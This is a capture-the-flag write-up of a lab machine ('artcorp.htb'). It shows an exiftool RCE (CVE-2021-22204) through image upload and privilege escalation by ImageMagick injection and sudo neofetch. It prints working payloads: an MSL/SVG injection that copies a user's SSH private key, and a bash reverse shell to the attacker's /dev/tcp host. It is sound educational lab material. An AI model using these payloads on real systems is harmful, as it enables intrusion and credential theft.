0x01 Introduction#
Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6, mac m1.
0x02 Information Gathering#
Port scanning shows that only ports 22 and 80 are open.
Accessing port 80 of 10.10.11.140 redirects to http://artcorp.htb/, but it is not accessible at the moment. Let's try setting the hosts file and accessing it again.
gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Accessing metaview, there is a file upload point.
Let's try uploading an image.
Through simple information gathering, it is found that the above image is the content parsed by exiftools.
0x03 Exploitation#
There is an RCE (Remote Code Execution) vulnerability here, with CVE number CVE-2021-22204.
Exploit:
Since it is difficult to reproduce this vulnerability on a Mac and requires the exiftool tool, switch to Kali to perform the operation.
Kali's IP is: 10.10.14.14.
Set the IP in the exploit to Kali's IP.
Run the exploit file to generate image.jpg.
Start listening on Kali.
nc -nlvp 9090
Access http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. This will successfully bounce back a shell.
Set up an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm
0x04 Privilege Escalation#
The current privilege is www-data, which does not have permission to view the user.txt file.
find / -perm -4000 -type f 2>/dev/null
Use pspy64 to view the running processes on the system and find a shell script convert_images.sh. Let's see what this script contains.
The content is as follows:
The mogrify command is used to create an image according to specified dimensions, blur, crop, dither, etc. Mogrify overwrites the original image file and writes it to a different image file.
Refer to this article:
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
Place this SSH key in the .ssh directory under the home directory of Kali, with the file name id_rsa. Note that the id_rsa file should not have spaces and the file permission should be 400.
Then SSH login using the id_rsa certificate to obtain user.txt.
ssh -i id_rsa [email protected]
Next, escalate to root privilege.
Run sudo -l and find that it has permission to execute the following command.
(root) NOPASSWD: /usr/bin/neofetch \"\"
Run the neofetch command, the effect is as follows:
According to https://gtfobins.github.io/#neo, if the file is run with sudo privileges, sudo can be used for privilege escalation.
Review the sudo -l configuration file again and find an environment variable XDG_CONFIG_HOME. We can take advantage of this when neofetch reads the configuration file of the environment variable, and write code to bounce back a shell in the configuration file, so that when the neofetch program is executed, a shell is bounced back.
The specific steps are as follows:
- Prepare a script for bouncing back a shell.
bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
- Write it at the beginning of /home/thomas/.config/neofetch/config.conf.
- Import the environment variable.
export XDG_CONFIG_HOME="$HOME/.config"
- Start listening with nc.
nc -nlvp 1234
- Execute neofetch.
sudo -u root /usr/bin/neofetch \"\"
Successfully bounce back a shell and obtain root.txt.
0x05 Summary#
- Couldn't find the target machine for CVE-2021-22204 after searching for a long time, and some Docker ones haven't been set up yet. It happened to learn how to exploit the CVE-2021-22204 vulnerability.
- Learned about privilege escalation using ImageMagick.